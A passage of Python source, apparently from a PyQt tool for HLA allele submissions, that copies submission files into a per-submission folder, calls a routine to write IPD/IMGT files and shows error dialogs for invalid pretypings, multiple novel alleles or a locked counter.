success = self.get_values()
if not success:
return False
project_dir = os.path.join(self.settings["projects_dir"], self.project)
mydir = os.path.join(project_dir, "IPD-submissions", self.subm_id)
os.makedirs(mydir, exist_ok=True)
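        # all input & output files of this submission run are collected in this per-submission folder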
try:
for myfile in [self.ENA_reply_file, self.pretypings]:
new_path = os.path.join(mydir, os.path.basename(myfile))
shutil.copy(myfile, new_path)
myfile = new_path
self.log.debug("Creating IPD file...")
self.get_chosen_samples()
self.get_files()
results = MIF.write_imgt_files(project_dir, self.samples, self.file_dic, self.allele_dic, self.ENA_id_map,
self.ENA_gene_map, self.pretypings, self.subm_id,
mydir, self.settings, self.log)
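            # on failure, results apparently starts with (False, <error type or message>, ...); on success it unpacks into the 7-tuple below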
if not results[0]:
if results[1] == "Invalid pretypings":
self.handle_invalid_pretyings(results[2])
return False
elif results[1] == "Multiple novel alleles in target locus":
self.handle_multiple_novel_alleles(results[2])
return False
else:
if "is currently creating IPD files" in results[1]:
mbox = IPDCounterLockedDialog(self, "IPD file creation error", results[1], self.settings,
self.log)
mbox.remove_lock.connect(self.handle_IPDcounter_lock)
return False
else:
print("MIF.write_imgt_files result:")
print(results)
QMessageBox.warning(self, "IPD file creation error", results[1])
return False
else:
(self.IPD_file, self.cell_lines, self.customer_dic, resultText, self.imgt_files, success,
error) = results
if error:
QMessageBox.warning(self, "IPD file creation error",
"An error occurred during the creation of IPD files:\n\n{}".format(repr(error)))
return False
if success:
if not resultText:
resultText = "All genes and alleles were resolved"